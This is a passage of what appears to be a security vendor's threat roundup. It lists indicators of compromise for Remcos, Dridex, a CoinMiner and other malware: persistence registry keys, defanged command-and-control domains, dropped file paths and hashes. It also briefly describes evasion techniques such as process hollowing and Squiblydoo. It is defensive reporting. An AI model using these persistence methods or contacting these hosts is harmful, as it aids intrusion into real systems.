<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 4cad00898e83b5ca86cd4000a82f9e90
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 4cad00898e83b5ca86cd4000a82f9e90
1
<HKCU>\SOFTWARE\4CAD00898E83B5CA86CD4000A82F9E90 1
<HKCU>\SOFTWARE\4CAD00898E83B5CA86CD4000A82F9E90
Value Name: US
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 87434db012ce80357c71a896aba97c20
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 87434db012ce80357c71a896aba97c20
1
<HKCU>\SOFTWARE\87434DB012CE80357C71A896ABA97C20 1
<HKCU>\SOFTWARE\87434DB012CE80357C71A896ABA97C20
Value Name: US
1
<HKCU>\SOFTWARE\2969DBEA9B653B908B01B2012E4BC676 1
<HKCU>\SOFTWARE\2969DBEA9B653B908B01B2012E4BC676
Value Name: US
1
MutexesOccurrences
<32 random hex characters> 14
Global\c0b9ada1-72a0-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
23[.]3[.]13[.]154 1
23[.]3[.]13[.]88 1
191[.]251[.]55[.]8 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ctldl[.]windowsupdate[.]com 1
a767[.]dscg3[.]akamai[.]net 1
sistem1[.]gotdns[.]ch 1
balakis[.]ddns[.]net 1
f00[.]ddns[.]net 1
hikonorz[.]no-ip[.]org 1
vida01[.]ddns[.]net 1
litchh[.]ddns[.]net 1
spacespy[.]zapto[.]org 1
trojanoficial1936[.]ddns[.]net 1
Files and or directories createdOccurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 15
\ba4c12bee3027d94da5c81db2d196bfd.exe 4
%TEMP%\svchost.exe 4
%TEMP%\svchost.exe.tmp 4
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ba4c12bee3027d94da5c81db2d196bfd.exe 4
E:\ba4c12bee3027d94da5c81db2d196bfd.exe 4
%TEMP%\ Explorer.exe 3
%TEMP%\ Explorer.exe.tmp 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\772d3e1cf411932582ba4607caf9d2f7.exe 2
%TEMP%\server.exe 1
%TEMP%\svhost.exe 1
%TEMP%\csrss.exe 1
%TEMP%\server.exe.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\babe8364d0b44de2ea6e4bcccd70281e.exe 1
E:\772d3e1cf411932582ba4607caf9d2f7.exe 1
\772d3e1cf411932582ba4607caf9d2f7.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\e101a39ab5de59589562aa0ff3295ba5.exe 1
E:\4cad00898e83b5ca86cd4000a82f9e90.exe 1
%APPDATA%\ Explorer.exe.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\4cad00898e83b5ca86cd4000a82f9e90.exe 1
\4cad00898e83b5ca86cd4000a82f9e90.exe 1
%APPDATA%\ Explorer.exe 1
E:\87434db012ce80357c71a896aba97c20.exe 1
%TEMP%\BOT-YT.exe.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\87434db012ce80357c71a896aba97c20.exe 1

*See JSON for more IOCs

File Hashes

0db9ac0a62287da4d0b80263a45ddabc79dd3f54d6f989e89185cd63dc22e566
1032f1415153dedcd1209bdb2a83049c7af94b3c5dfaa8444a711668b44a64e7
219067b11bde409cbfe74925bba7a4edeb737bb3e7335c944b1ddd285a8121bc
377ee96a9cad458044adf93f4489e073498ba035225f659ceb8f454579bcf00a
53866f76ec02d7b28ebe834130523393a4228ff644cb9ff4ba96c4b5f6eb7d35
7996eb113ec08dce2dae366b5906bdc47e308e1bd3c8021c0e5e075044973d3a
9174438c87aedbe8ace4830cf495e79ac8017fac6a053be6c4a1e425c7127879
a9c4abecd7507afbf0158e074e1cb86ce4d8fe044dda116c8c8b61ef0be17b2d
b824602e58c113b6fa3bee703b305ce7afdca6f623dfd45433f1bf91b7161f88
be3de999cb21edb7cc05c0c8cd9c351fe43baee6332b3cfa8e4c94bcc14f2aec
c654a3b65a1618c56ec031abba4351ce8a2e4ad588e97055f300ed8315b30005
d397d4fdf0b7d492cf6ef35cbff4f597103ae38541baa9d42ab0a70e46ada8ac
dbd197e117b5bab38c804eaba8b01b6618134418dffcfd63307e81dd67297b85
f27c56ad0fc37b98fc3eb8dd614d8b6dbaa7a85a70c4c12ae581b9b43b5e272a
f76ef7de1759f6716082b5a5dec905382c9995d2d8f3f77039488df2bcc195f0

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.CoinMiner-9833198-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
136[.]144[.]56[.]255 26
147[.]75[.]47[.]199 26
135[.]181[.]49[.]32 26
172[.]67[.]155[.]149 15
104[.]21[.]80[.]237 11
50[.]19[.]252[.]36 4
23[.]21[.]76[.]253 4
54[.]225[.]220[.]115 3
54[.]235[.]189[.]250 3
54[.]225[.]66[.]103 2
54[.]235[.]83[.]248 2
23[.]21[.]126[.]66 2
54[.]221[.]253[.]252 2
23[.]21[.]252[.]4 1
54[.]235[.]142[.]93 1
54[.]243[.]164[.]148 1
23[.]21[.]140[.]41 1
50[.]19[.]96[.]218 1
23[.]21[.]48[.]44 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
icanhazip[.]com 26
thesellminingpanelka[.]space 26
api[.]ipify[.]org 21
Files and or directories createdOccurrences
%APPDATA%\WinHost 26
%APPDATA%\WinHost\.msdat 26
%APPDATA%\WinHost\kernel.exe 26
%APPDATA%\WinHost\syswow.exe 26
%System32%\Tasks\UpdateWindows 26

File Hashes

00f589b973d9ddf0e3db6d567f77886c0e8a0ad7920f000de3f6cc3948439281
036b8a21e359548bb8e801e61a2a563e8877c39b5e689a7e679751bcad46d477
03addbd129b7de3d7d508d1d1b8deba6aee86127f98c4918022c9b43f78b072e
04dc096af986a9add7a85214455d58e97a34e4bdf3dee7272c455a401e3680d0
064e38cda346c8cfa42db4ef0a2a4c188586e8d4a303e5f97c32b42fb5482d78
0964b8355fa66c316052a8b1c301a7bcc71917337ff17aea4098ee0fd14bd3fa
0a63ab3b6b1943a68da5b5edd037422fe0c7bbe646f2578b8c5affb58f9f6b22
0f284c56661707f11c7bf248323d1699f0d3c3f747b5a720d9d2f51deae00104
0f71d11f24c6d489ee01b40eda3d9278452b0d2ba928feb20fa1c2906270f695
0fb3382e2773d2c89b5df7b08f19001bc8ea66783a720118a2f317f45f460cb8
10d7b61a9abd5c49650304f5d0bb19f392e1bbe5f910d100441b8cb6f3ac1877
133900dd382c7a2159a5718a5aabf95c68fd47d77220d663ff2d48bf4d798162
15012baf2a25fbd426ced94c36175f41337b0e50128a0c5d475572e7e3c20d3b
15ccf19e26a40e2da63e6fc533a26fa39230374ec8cc8e0898680e7539d2383f
19885be40ef5a7b44b26d32d64bf4efcf9d3c5fc70c6edefd2ad40635f6d9912
1b07efa7944cb20c5d2864a86922f48bc8548eb1168da8f6ac225afd53816e10
1bc5c6fd70de7b1d23cc5092a2272e38f99deceadf0e28ee03f0035885c8d4ab
1f2701d2976175f9ee326c37acd01d1a639d43264002c1fc9bd33e7cf92c8aaf
1f3cc8fb5799308801f2d42a2aef65fd3edb8463d997ff55d62f40bdd7b9ebde
2097e8760dc7d3e2a3db2dcd4731a54a49ec71671f16c0d57c0653897bb05e07
215203c148bbf1653422a1ad3a81a28e1b0d98cd299325f8698f56e40d9274f8
21c3fa1c14e8b604d2aef7f3c9037889e8dcbc8dc3a4b5f70d57da3fe6f474e9
21e9b45282e01ebabd61e07cf9aa204e46e032a1d1acfb2303b8e0f670567448
22b08643b67050fa5d35661cf4f52640ca54cb51f0284653f1de6ae6d78be228
2aae4aacd43eb084f256832fc79063d2f32c7b761913b98137fb35dcfe89f39b

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Remcos-9835338-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: win
8
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'> 8
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'>
Value Name: exepath
8
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'>
Value Name: licence
8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
2
MutexesOccurrences
Remcos_Mutex_Inj 8
Remcos-<random, matching [A-Z0-9]{6}> 8
Global\{8b6f465d-30c8-4bc5-bfa5-37d69ca0c565} 2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
103[.]150[.]60[.]242 10
192[.]253[.]246[.]142 3
104[.]250[.]185[.]70 2
45[.]74[.]32[.]12 1
37[.]230[.]130[.]153 1
196[.]251[.]67[.]199 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
mtspsmjeli[.]sch[.]id 10
hsyuwbvxczbansmloiujdhsbnbcgywqauaghxvz[.]ydns[.]eu 3
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop[.]ydns[.]eu 2
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap[.]ydns[.]eu 2
swryijgrvcsgkopnmcdertvgdswbvmophtfdczxs[.]ydns[.]eu 1
ghdyuienah123[.]freedynamicdns[.]org 1
gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye[.]ydns[.]eu 1
Files and or directories createdOccurrences
%APPDATA%\logs.dat 8
%TEMP%\install.vbs 8
%APPDATA%\win.exe 7
%ProgramFiles(x86)%\AGP Manager 2
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 2
%System32%\Tasks\AGP Manager 2
%System32%\Tasks\AGP Manager Task 2
%TEMP%\tmp50F9.tmp 1
%TEMP%\tmp5888.tmp 1
%TEMP%\tmp5E24.tmp 1
%TEMP%\tmp5667.tmp 1
%APPDATA%\vlc.exe 1

File Hashes

1d1034f544122ee61bd440c91e70919f815933418efae74b22215b5f384a9492
422cc4ab46ac67030dcf4da2b6211913c55dbc51962f578a6419ea52417db806
496fa2a5a6abbc22d6a4c63e31847156d61c240d8e3a793e1b4de46e09827b52
4a2f8900f2a6f2f2b06ab5fe12cb39bfa77be36739b4c59e6d8a7706c2262f4e
4ef3b9bb1838d76bda8e4e09b033c1948ed6d96c4df1962d7e8b3006ac121158
4fb16635e5aa65a5447e6d3122aa855802ded38ad924449c5c1da1b663a60a87
6141efb6f1598e2205806c5a788e61c489440dfc942984ee1688bb68ad0f18df
6df0138ef184c816e119879763ce7cad7c71662ad1c7100fa28de9053166f121
75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
93534ad76f71c7ba49fceec2156c76a715aa354fa01a8894e7542c76e853d896
b168d039dfea8607880d790f371ae8eccd008a980a15d44568c95784f5c5cf47
c79daeeb345b091760f3f1ac357454315d5d7b12792a129396b37da6a4bda5cf

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9833501-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
26
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 26
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]10[.]78 25
104[.]23[.]98[.]190 15
104[.]23[.]99[.]190 11
173[.]194[.]68[.]100/31 11
72[.]21[.]81[.]240 8
23[.]3[.]13[.]154 6
173[.]194[.]68[.]113 6
173[.]194[.]68[.]138/31 6
23[.]3[.]13[.]88 4
173[.]194[.]68[.]102 2
172[.]217[.]6[.]238 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 26
w[.]google[.]com 26
www3[.]l[.]google[.]com 25
ctldl[.]windowsupdate[.]com 18
a767[.]dscg3[.]akamai[.]net 10
cs11[.]wpc[.]v0cdn[.]net 8
www[.]upz7qrbwmu[.]com 2
www[.]eckjconcv9[.]com 2
www[.]2qpihnec9c[.]com 2
www[.]pywy4qb7e8[.]com 2
www[.]h1dfqgsnro[.]com 2
www[.]su0tipnipi[.]com 2
www[.]7br0aq6uuk[.]com 2
www[.]kweqxn5kq0[.]com 2
www[.]cxp0bxh0do[.]com 2
www[.]rpucoty6ru[.]com 2
www[.]sd2ylwl2qq[.]com 2
www[.]k4aiunpqhu[.]com 2
www[.]z4gzstsojt[.]com 2
www[.]0lye7vcyap[.]com 2
www[.]3ekqkrbab5[.]com 2
www[.]brni2gfck5[.]com 2
www[.]in8t4hicui[.]com 2
www[.]ioxl2nqbhx[.]com 2
www[.]mz2xcs9uhn[.]com 2

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 25
\Temp\HncDownload\Update.log 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes

1630e7419f11c53228dd0686a5129ee44f6b1e6a73767f418c5a716d12a075c4
1995d1a3435e5b7d9eb425973c2d3cb34059bcd852a4eb8748837ae706054781
22a719fe3597d52a4ab83bd9d0be81ab84ad0fc7409338bdee9966988b572c85
23464363cba08e27fe80216b5fd4357dcacf8a5224595e93a9140f31d5cbc566
29c11e08afae3ab8a6a710ba9ddb9fa7ff7940b11c2b1f923a678eb751e5bd85
2fc84c525ac1d702f88e30859959de5ca80ddf2f72dbfa05a448d66c8b753256
353336a6c39312c51f7666cc2b3d80d1b27c239235dd2399154f193f3b2df4a1
3aac71ff580fd15ebdaf1b23928eced0fb5af5155d94ec8c7fec5c0bfb5b5a0b
3d8145249e8c326d93c5d41889be15281e793082cd35d54a8ca943b529ca3b38
430a27095ef10105e48f9f28c1c4ac4071fb18f761b5d13aa96ba0cacb3ae45b
4822a7b53c1869b43a3ebc118b43916f4f77bd03f5bdf3498b18a378f3e86803
48c34b58244f2d1849f3f0bd00920032e968efe02c3f883151cb4aa88943117f
4a48c638dab35fa78192f7747b068cc129da710066028c43170ae12eb460f167
4b7722bafa8983254b2100291560bd1387e89aa098e6272fc654565a606d62cf
513528abdc5db50033b92f9a3400e0cf9f5263e1749377f5ef0aff2e1b9b21d6
51fa5c10aa5dc6afff5c83bae523901b4de99d3a59ed4bc9120153d6312c54b9
5e1e4f805c3e18e77f59585774c160e27e577f993e3f89610574d47320354f3d
6646576f008d36954245ed5bf69a3b23366f320c5d6706034d19481972d4d0f3
6a183798948fb128face5ebf15d7dbbc39420f370905ed19293697fcf4f4e799
6e35bbccb1acacc25c051e8776752d398fcfa99290cb3003e16ce2d447e06f4f
7be5d5f55d1600a3a7a08d8dd4f442ad2ef6e966bf42b1294ab77dd6d0c71280
88d28d8f8f4b4ba6592bd826e2881e243322018751e5695d841984d629d9eada
94cbe027b84ae0c215a6b1e53874c5abbae2ad1171c67d9036d5fb3a475cd4c3
9585d3dc928b2d61e93e2c865b2c9a91d08997d1d2d011a222259e770f3f43c2
9a633c5cb26ec4fdda6a2291b2baa62b74c9f228a993969554a2f67d5ab6ff78

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Ursu-9833566-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
MutexesOccurrences
USERNAME 4
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
208[.]100[.]26[.]242 4
192[.]109[.]92[.]99 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
52eva[.]top 4
Files and or directories createdOccurrences
%ProgramFiles(x86)%\Adobe\Reader 9.0\Reader\rasadhlp.dll 4
%ProgramFiles(x86)%\Java\jre6\rasadhlp.dll 4
%ProgramFiles(x86)%\Java\jre7\rasadhlp.dll 4
%ProgramFiles(x86)%\Microsoft Office\rasadhlp.dll 4
%ProgramFiles(x86)%\Mozilla Firefox\rasadhlp.dll 4
%ProgramFiles%\WinRAP 4
%ProgramFiles%\WinRAP\RarExt32.dll 4
%System32%\wbem\rasadhlp.dll 3
%SystemRoot%\SystemApps\ShellExperienceHost_cw5n1h2txyewy\rasadhlp.dll 3
%SystemRoot%\rasadhlp.dll 3

File Hashes

1417908c87ae8c41691659a80a8e5335a7266f078a4222369879f50d7ea22773
14fc4196ea8536770a6dd344b37b2531c3ef69c9b41c1d7cfc63e861675a98a9
201fbd917ff780cf872c17db19c500400506a213bd653d83f1b4ae2b3d690dac
2867514ffd3024c44067180bdf69e9e8e183dadcbbac511a7793efe21a6d95f0
2ddb5912847e754fd5a8d2b17772bbb2d3f5d4e01d51c20a5bdc696265bd13ed
450625843bea9b2705979362b2353fece2a4d3bfebda14127be0ba47e315d5c6
607497d377216cb257c37d60dff60e7c57e6661525bfea6962f405fbce806a0d
62c463a4653d787dbaf68834273c753747be4fe8fe7eb6ade3ecf034f461359f
71ea9c92d2a9e996cbc35a9f6673a8e3474a01aa3908442d3111660c21b490f3
73d7ccc74c8cb5d16b0332788bfc0c82a9beb4887113fba568c41d85ba72e42f
78ad16035993f75dd01b184ee5aaaa388bc85913714b333f2669a4935b3e53c5
86043f4901ea8e49dda0cf901d6a5c8820e84dfe24bbde9fbd086439659ec975
8a7dd84bd58d3e20f1431089bf938c03317c962f26c0db3c12e8f9d4c077cf8f
8b989f40ec0944529cfb1b4387865ae058015993a73665f45dc7da644ab08d5d
8d33b7cd396e374d131d13ecf88b1675e0053c892efcce58bc14ab53cd1cbdc3
98a8d22f2acd74ff9e5be3f282a4966e8802b99457b00a805c5f86ce5ffa9303
99c1234ee2e63ba69d2755939176350714d421717c5bbb9b1ab024c2fe1868b6
9b532bc2d822d20f692d79fc4522022276fa88766527d978dd1cde707cb2b27e
a134b1360963ce687e575c11dbe2f417d0fbf0ad9010ff3153385c69967fde99
a47d1bbe15dc3a680598d7901134b0f119a4814b090c233e66df3928685e744e
a724b470595a55f6619752ebd7e77b6d22acfe4631ca27ad593523ef242963c6
b094c730d346b98f437a8bbe38a6821243fd1175e4630a486b2a51c13db2e70b
b227cc350406f3f3a0a9c82e10f4a489d890f2f789c2e75d6e8dc27f44a5be1c
b3a416835f48ba77c5557dfa59bda6be558c6894bcea1f878283314ebb9406a4
c4f82df82004b5d05c8528ede22a2f5c06bb3a26a729525901183640f491b7d0

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Crystalbit-Apple DLL double hijack detected - (10120)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Process hollowing detected - (3572)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (2886)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (1687)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Kovter injection detected - (739)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (698)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
CVE-2019-0708 detected - (114)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Gamarue malware detected - (107)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Trickbot malware detected - (85)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (53)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.